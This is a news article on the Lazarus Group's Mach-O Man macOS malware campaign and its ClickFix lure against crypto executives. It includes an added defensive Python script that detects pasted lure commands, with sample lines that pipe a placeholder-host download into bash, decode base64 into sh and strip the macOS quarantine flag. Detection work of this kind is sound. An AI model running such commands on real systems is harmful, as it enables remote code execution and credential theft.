TLDR
- CertiK said the Lazarus Group launched the Mach-O Man malware campaign targeting crypto and fintech executives.
- Researchers linked more than $500 million in recent exploits to activity connected with the Lazarus Group.
- The attackers used the ClickFix method to trick victims into running harmful terminal commands on macOS systems.
- Security experts said the malware grants access to corporate systems and financial platforms before erasing itself.
- CertiK warned that many affected firms may not yet realize their systems were compromised.
North Korean hackers have launched a new macOS malware campaign targeting crypto and fintech executives, security researchers said Wednesday. CertiK linked the activity to the Lazarus Group and warned that attackers now operate at institutional speed. The campaign, called Mach-O Man, has already coincided with more than $500 million in recent exploits.
Lazarus Group Expands Operations With Mach-O Man Malware
CertiK researcher Natalie Newson said the Lazarus Group developed Mach-O Man through its Chollima division. She described it as a modular macOS malware kit built with native Mach-O binaries for Apple systems.
She said attackers focus on fintech and cryptocurrency executives who control large digital assets. The group has accumulated about $6.7 billion in crypto loot since 2017.
In the past two weeks, hackers siphoned over $500 million from Drift and KelpDAO exploits. Newson said the activity shows coordinated and state-directed financial operations.
“What makes Lazarus especially dangerous right now is their activity level,” Newson said. She added that recent attacks show speed and scale similar to institutions.
She urged firms to treat the threat like banks treat nation-state actors. “They must view it as a constant and well-funded threat,” she said.
ClickFix Tactic Drives Direct Credential Theft
Researchers said Mach-O Man spreads through a social engineering method known as ClickFix. Newson said media reports often confuse the malware kit with the delivery method.
ClickFix prompts victims to paste a command into their Mac terminal to resolve a fake connection issue. Attackers send urgent meeting invitations through Telegram to initiate contact.
Mauro Eldritch, founder of BCA Ltd, said victims receive links for Zoom, Microsoft Teams, or Google Meet calls. The links lead to fake websites that mimic legitimate platforms.
The websites instruct executives to copy a simple command to fix a supposed technical error. Once executed, the command grants attackers access to corporate systems and SaaS platforms.
Security researcher Vladimir S. said attackers also hijacked DeFi project domains using similar tactics. In some cases, hackers replaced websites with fake Cloudflare pages requesting terminal commands.
“These fake verification steps guide victims through keyboard shortcuts that run a harmful command,” Newson said. She added that victims often initiate the breach themselves.
Traditional security controls fail because users execute the commands voluntarily, and the malware erases itself before it can be detected.
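The delivery pattern described above (a user pastes a "fix" command into Terminal, the payload runs, then removes its traces) leaves little for signature-based tools to catch, but the pasted one-liners tend to share a structure. The following is an added illustration, not code from CertiK or the article, of a defender-side heuristic that scans shell history or endpoint command telemetry for that structure. The rule set and the sample history lines are constructed assumptions about the technique in general, not indicators from this campaign.

```python
"""Added example (not from CertiK or the article): flag ClickFix-style
shell one-liners in macOS shell history or endpoint command telemetry.

ClickFix lures ask a user to paste a command into Terminal to "fix" a fake
error. The exact command varies, but the shape is stable: a remote fetch
piped straight into an interpreter, an obfuscated payload decoded on the
fly, a Gatekeeper quarantine flag stripped, or a script deleting itself.
These heuristics are assumptions about the technique, not indicators
published by the article.
"""
import re
from dataclasses import dataclass

# (rule name, pattern) pairs; each pattern targets one stage of a typical lure.
RULES = [
    # e.g. "curl -fsSL https://.../fix.sh | bash": download piped to a shell
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # e.g. "echo <blob> | base64 -d | sh": obfuscated payload decoded into a shell
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # inline interpreter execution, common in second-stage loaders
    ("python_inline_exec", re.compile(r"\bpython3?\s+-c\s+")),
    ("osascript_inline", re.compile(r"\bosascript\s+-e\s+")),
    # script removing itself or a dropped temp file after running
    ("self_delete",
     re.compile(r'\brm\s+(-[a-zA-Z]*f[a-zA-Z]*\s+)?("?\$0"?|/tmp/\S+)')),
    # stripping the quarantine attribute so Gatekeeper does not prompt
    ("quarantine_bypass",
     re.compile(r"\bxattr\s+(-d\s+com\.apple\.quarantine|-c)\b")),
]


@dataclass
class Finding:
    line_no: int
    rule: str
    command: str


def scan_history(lines):
    """Return one Finding per (line, rule) hit, in input order."""
    findings = []
    for n, line in enumerate(lines, start=1):
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(n, name, cmd))
    return findings


def risk_score(findings):
    """Number of distinct rules hit; a pasted lure usually trips two or more."""
    return len({f.rule for f in findings})


# Constructed sample history: two benign entries around three lure-shaped ones.
# The hostname is a placeholder (.invalid TLD), not a real indicator.
SAMPLE_HISTORY = [
    "git status",
    "brew update",
    "curl -fsSL https://example.invalid/fix-zoom.sh | bash",
    "echo aGVsbG8= | base64 -d | sh",
    "xattr -d com.apple.quarantine ./ZoomUpdate",
    "ls -la",
]

if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for f in hits:
        print(f"line {f.line_no}: {f.rule}: {f.command}")
    print("distinct rules hit:", risk_score(hits))
```

In practice the same rules can be run over `~/.zsh_history` collected by an EDR or over process-creation events, where the parent process being Terminal and the child being a shell fed from a pipe is the telling combination; because the lure relies on the victim typing the command, the command line itself is the most durable artifact even after the payload has removed its files.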
Newson said many victims remain unaware of the breach. “They likely don’t know it yet,” she said.
She added that affected firms may struggle to identify which variant compromised their systems. CertiK reported the findings as part of ongoing threat monitoring this month.